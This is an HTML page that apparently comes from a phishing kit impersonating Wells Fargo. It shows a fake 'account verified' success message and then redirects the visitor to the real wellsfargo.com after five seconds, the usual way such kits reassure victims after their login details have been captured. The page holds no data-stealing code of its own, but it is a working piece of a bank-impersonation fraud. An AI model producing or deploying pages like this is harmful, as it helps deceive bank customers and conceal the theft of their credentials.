
<!DOCTYPE html>
<html lang=en>
<head>
    <meta charset=utf-8>
    <meta http-equiv=X-UA-Compatible content="IE=edge">
    <meta name=viewport content="width=device-width,initial-scale=1">
    <meta name=description content="">
    <meta name=keywords content="Wells Fargo Online Banking">
    <title>Wells Fargo - Banking, credit cards</title>

 <html><meta http-equiv="Refresh" content="5; https://www.wellsfargo.com"></html>


    <script src="https://code.jquery.com/jquery-2.2.1.min.js" ></script>

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootswatch/3.3.7/superhero/bootstrap.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bootbox.js/4.4.0/bootbox.min.js"></script>


</head>
<body>
	<div class="col-lg-1"></div>
	<h2><i class="glyphicon glyphicon-ok"></i> Success</h2>
	<div class="col-lg-1"></div>
<div class="alert alert-dismissible alert-success col-lg-3">
  <strong>Thank you for verifying your account. </strong><br> You can continue using your account without restrictions.</div>
</body>
